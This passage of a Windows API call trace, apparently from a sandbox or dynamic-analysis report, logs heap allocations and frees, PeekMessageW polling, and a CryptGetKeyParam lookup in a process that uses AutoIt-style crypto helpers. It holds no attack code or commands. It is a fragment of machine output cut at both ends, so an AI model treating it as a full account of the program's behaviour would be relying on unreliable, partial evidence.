(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0164.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0164.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0164.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0164.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0164.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0164.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0164.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0164.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.942] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0164.942] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2888, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2888*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.956] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.957] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0164.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.957] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.958] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.958] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.958] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.958] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.958] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.958] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.959] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.959] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.959] PeekMessageW (in: lpMsg=0x87ee3c, 